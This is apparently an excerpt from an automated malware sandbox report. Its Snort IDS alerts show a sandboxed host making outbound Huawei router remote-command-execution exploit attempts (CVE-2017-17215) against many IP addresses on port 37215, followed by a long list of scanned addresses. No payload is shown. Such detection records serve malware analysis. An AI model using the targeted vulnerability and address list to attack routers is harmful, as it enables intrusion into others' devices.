                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46000 -> 197.115.0.107:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46000 -> 197.115.0.107:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43048 -> 41.99.251.245:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43048 -> 41.99.251.245:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39044 -> 156.86.255.150:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39044 -> 156.86.255.150:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37730 -> 197.253.193.58:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37730 -> 197.253.193.58:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47400 -> 197.235.203.125:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47400 -> 197.235.203.125:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54106 -> 41.67.94.127:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54106 -> 41.67.94.127:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58072 -> 197.168.250.8:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58072 -> 197.168.250.8:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45608 -> 197.23.121.148:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45608 -> 197.23.121.148:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35748 -> 156.32.16.165:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35748 -> 156.32.16.165:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33858 -> 41.248.249.197:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33858 -> 41.248.249.197:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33040 -> 197.218.110.112:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33040 -> 197.218.110.112:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37542 -> 197.99.180.169:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37542 -> 197.99.180.169:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58256 -> 156.251.224.110:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58256 -> 156.251.224.110:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37020 -> 156.41.125.115:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37020 -> 156.41.125.115:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33598 -> 156.248.26.132:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33598 -> 156.248.26.132:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33548 -> 156.255.160.13:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33548 -> 156.255.160.13:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45904 -> 197.54.76.33:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45904 -> 197.54.76.33:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39260 -> 41.43.246.92:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39260 -> 41.43.246.92:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60846 -> 197.78.104.164:37215
                Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60846 -> 197.78.104.164:37215
                Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41980 -> 197.180.166.46:37215
                Source: global trafficTCP traffic: 41.90.65.244 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.98.9.92 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.247.210.248 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.75.213.161 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.194.8.16 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.12.116.6 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.48.52.114 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.36.107.172 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.205.28.154 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.96.137.187 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.160.6.126 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.110.206.113 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.55.27.141 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.146.20.194 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.125.41.46 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.247.234.164 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.230.236.158 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.33.122.105 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.14.72.52 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.111.198.15 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.147.3.74 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.78.236.244 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.237.145.22 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.122.69.214 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.232.239.102 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.179.252.52 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.104.167.238 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.211.8.148 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.200.116.255 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.179.249.131 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.214.144.66 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.52.132.92 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.166.118.124 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.83.91.62 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.248.173.7 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.103.28.13 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.165.218.63 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.231.176.148 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.117.173.189 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.79.42.89 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.177.59.243 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.208.88.155 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.154.51.247 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.152.88.10 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.169.148.172 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.112.147.232 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.9.89.193 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.165.22.32 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.105.239.212 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.231.239.109 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.35.143.17 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.188.227.67 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.135.152.118 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.78.104.164 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.82.229.143 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.142.220.142 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.221.214.189 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.50.232.201 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.214.144.67 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.199.250.147 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.9.242.9 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.30.194.173 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.123.248.96 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.130.253.152 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.240.150.152 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.3.195.204 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.205.109.92 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.227.95.173 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.104.63.204 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.175.177.129 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.41.202.156 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.89.135.49 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.170.252.205 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.214.90.82 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.37.227.10 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.150.152.40 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.103.70.193 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.153.255.196 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.201.118.253 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.229.242.241 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.86.162.204 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.36.96.143 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.70.154.169 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.92.241.165 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.20.95.37 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.0.17.67 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.14.141.196 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.103.242.245 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.149.180.35 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.113.37.53 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.177.158.186 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.11.214.222 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.252.148.60 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.244.234.190 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.216.202.200 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.84.85.34 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.150.62.189 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.107.104.42 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.81.56.92 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.129.100.45 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.53.31.254 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.115.91.80 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.237.52.108 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.122.252.45 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.150.130.171 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.224.71.250 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.190.62.144 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.33.12.217 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.90.26.85 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.211.225.173 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.36.37.62 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.131.196.119 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.108.110.143 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.152.249.204 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.166.144.123 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.166.206.128 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.126.43.232 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.16.196.29 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.45.22.82 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.45.119.80 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.59.162.17 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.168.230.94 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.67.95.193 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.244.195.251 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.128.113.32 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.158.244.197 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.7.148.192 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.128.79.106 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.27.216.116 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.14.47.226 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.216.160.250 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.249.174.206 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.33.21.171 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.123.179.165 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.196.43.135 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.70.230.42 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.44.131.144 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.57.150.89 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.219.159.225 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.17.37.241 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.134.23.10 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.10.31.90 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.214.111.110 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.177.30.122 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.36.89.39 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.165.119.187 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.42.14.45 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.134.25.235 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.212.160.21 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.36.119.208 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.159.31.34 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.178.155.231 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.169.238.174 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.229.62.31 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.39.58.194 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.163.224.106 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.174.190.39 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.25.184.121 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.175.239.199 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.99.46.18 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.181.84.194 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.152.22.243 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.178.144.38 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.35.249.57 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.166.30.213 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.23.36.202 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.49.177.241 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.86.48.145 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.12.153.202 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.11.77.17 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.97.24.26 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.142.21.60 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.188.62.145 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.32.235.166 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.192.253.160 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.142.78.120 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.74.88.212 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.54.177.90 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.203.157.254 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.34.208.184 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.140.95.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.199.204.23 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.23.70.120 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.248.247.118 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.15.57.149 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.42.245.214 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.3.188.252 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.239.116.59 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.43.135.32 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.144.100.35 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.181.204.177 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.65.240.46 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.155.155.170 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.160.131.122 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.122.119.98 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.23.213.44 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.240.2.210 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.176.156.206 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.218.186.212 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.175.137.231 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.55.64.7 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.175.166.155 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.73.253.240 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.76.10.213 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.65.170.88 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.122.52.32 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.157.9.179 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.176.80.91 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.68.4.247 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.214.90.252 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.232.182.83 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.137.12.98 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.92.82.210 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.222.236.72 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.142.237.9 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.172.65.104 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.15.199.182 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.218.110.112 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.94.214.237 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.59.10.212 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.155.196.190 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.253.125.109 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.154.152.237 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.244.153.193 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.162.62.98 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.217.92.133 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.223.90.188 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.128.166.29 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.1.228.185 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.37.35.158 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.160.179.42 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.240.94.26 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.99.153.2 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.122.39.98 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.103.223.59 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.83.22.114 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.64.196.190 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.253.129.162 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.28.131.87 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.194.187.118 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.169.108.91 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.36.122.28 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.204.141.63 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.253.22.215 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.115.0.107 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.147.47.111 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.70.107.29 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.195.76.22 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.164.90.89 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.103.79.200 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.75.9.62 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.133.233.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.242.32.10 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.53.253.110 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.236.158.214 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.216.208.178 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.153.188.163 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.151.148.107 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.7.73.158 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.53.210.229 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.211.139.167 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.91.127.203 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.36.117.78 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.251.163.18 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.93.232.37 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.79.30.8 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.78.163.231 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.244.186.25 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.86.98.227 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.69.119.231 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.107.88.231 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.247.89.158 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.23.121.148 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.94.35.254 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.84.49.198 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.154.140.211 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.179.99.27 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.111.227.122 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.106.253.26 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.195.168.65 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.73.147.202 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.34.13.214 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.220.120.7 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.180.54.14 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.9.23.80 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.113.63.75 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.193.225.65 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.193.27.177 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.164.21.89 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.86.255.150 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 41.103.189.205 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 197.231.184.84 ports 1,2,3,5,7,37215
                Source: global trafficTCP traffic: 156.125.253.150 ports 1,2,3,5,7,37215
